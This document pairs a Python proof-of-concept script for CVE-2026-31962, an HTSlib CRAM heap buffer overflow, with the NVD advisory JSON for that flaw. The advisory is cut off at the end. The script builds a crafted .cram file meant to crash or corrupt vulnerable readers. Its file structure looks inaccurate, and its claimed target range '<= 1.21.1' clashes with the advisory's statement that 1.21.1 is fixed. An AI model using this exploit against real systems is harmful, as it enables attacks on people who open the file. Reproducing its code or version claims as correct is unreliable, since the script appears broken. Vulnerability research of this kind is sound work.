CVE-2026-31962

#!/usr/bin/env python3 """ CVE-2026-31962 PoC - HTSlib CRAM heap buffer overflow This PoC demonstrates the vulnerability in HTSlib's CRAM format parsing. Generated for security research purposes only. """ import struct import sys def create_malicious_cram(): """ Create a minimal CRAM file that triggers the heap buffer overflow in cram_decode_seq() function. """ # CRAM file header header = bytearray() header.extend(b'CRAM') # Magic number header.extend(struct.pack('<I', 3)) # Version 3.0 header.extend(struct.pack('<I', 0)) # File ID # Container header container = bytearray() container.extend(struct.pack('<Q', 1)) # Block count container.extend(struct.pack('<Q', 100)) # Total size # Block with malicious data to trigger overflow block = bytearray() block_type = 0x02 # Compression header block block_content_id = 0x00 # Craft payload that causes off-by-one read/write in heap # This triggers the vulnerability when parsing CRAM records # with omitted sequence/quality data payload = bytearray([ 0x00, 0x01, 0x00, 0x00, # Record type and flags 0xFF, 0xFF, 0xFF, 0xFF, # Bit flags indicating no seq/qual 0x00, 0x00, 0x00, 0x01, # Sequence length (triggers boundary) 0x00, 0x00, 0x00, 0x00, # Quality length 0x41, 0x42, 0x43, 0x44, # Padding data (controlled by attacker) ]) block_data = bytes(payload) block_size = len(block_data) + 8 # + header bytes block_header = struct.pack('>BBHI', block_type, block_content_id, 0, block_size) block = block_header + block_data return bytes(header + container + block) if __name__ == '__main__': print('[+] Generating PoC for CVE-2026-31962') print('[+] Target: samtools/htslib <= 1.21.1') print('[+] Vulnerability: Heap buffer overflow in cram_decode_seq()') malicious_cram = create_malicious_cram() output_file = 'CVE-2026-31962_poc.cram' with open(output_file, 'wb') as f: f.write(malicious_cram) print(f'[+] PoC file created: {output_file}') print(f'[+] File size: {len(malicious_cram)} bytes') print('[!] This file triggers heap buffer overflow when opened by vulnerable htslib') print('[!] Exploitation may lead to code execution or denial of service')

{"cve": {"id": "CVE-2026-31962", "sourceIdentifier": "[email protected]", "published": "2026-03-18T18:16:28.190", "lastModified": "2026-03-19T17:30:45.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data. While most alignment records store DNA sequence and quality values, the format also allows them to omit this data in certain cases to save space. Due to some quirks of the CRAM format, it is necessary to handle these records carefully as they will actually store data that needs to be consumed and then discarded. Unfortunately the `cram_decode_seq()` did not handle this correctly in some cases. Where this happened it could result in reading a single byte from beyond the end of a heap allocation, followed by writing a single attacker-controlled byte to the same location. Exploiting this bug causes a heap buffer overflow. If a user opens a file crafted to exploit this issue, it could lead to the program crashing, or overwriting of data and heap structures in ways not expected by the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo bioinformáticos. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN. Si bien la mayoría de los registros de alineación almacenan valores de secuencia de ADN y de calidad, el formato también permite omitir estos datos en ciertos casos para ahorrar espacio. Debido a algunas peculiaridades del formato CRAM, es necesario manejar estos registros con cuidado, ya que en realidad almacenarán datos que deben ser consumidos y luego descartados. Desafortunadamente, `cram_decode_seq()` no manejó esto correctamente en algunos casos. Donde esto ocurrió, podría resultar en la lectura de un solo byte más allá del final de una asignación de montón, seguido de la escritura de un solo byte controlado por el atacante en la misma ubicación. Explotar este error causa un desbordamiento de búfer de montón. Si un usuario abre un archivo diseñado para explotar este problema, podría provocar el bloqueo del programa o la sobrescritura de datos y estructuras de montón de formas no esperadas por el programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No hay una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-129"}, {"lang": "en", "value": "CWE-787"}]}], "configurations ... (truncated)